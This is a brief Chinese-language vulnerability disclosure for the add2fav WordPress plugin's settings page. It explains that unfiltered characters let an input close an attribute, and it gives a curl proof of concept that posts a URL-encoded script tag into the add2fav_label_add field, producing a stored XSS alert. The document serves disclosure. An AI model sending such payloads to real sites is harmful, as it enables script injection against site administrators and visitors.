由于没有过滤一些字符,从而导致可以构造闭合,并造成XSS
POC如下:
curl ‘http://exsample.com/wp-admin/options-general.php?page=add2fav_uid’ –data ‘add2fav_hidden=Y&add2fav_label_add=
%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript
%3E&add2fav_label_rem=Remove+from+Favorites
&add2fav_label_reg=&add2fav_label_off=%23&Submit=Save+Changes’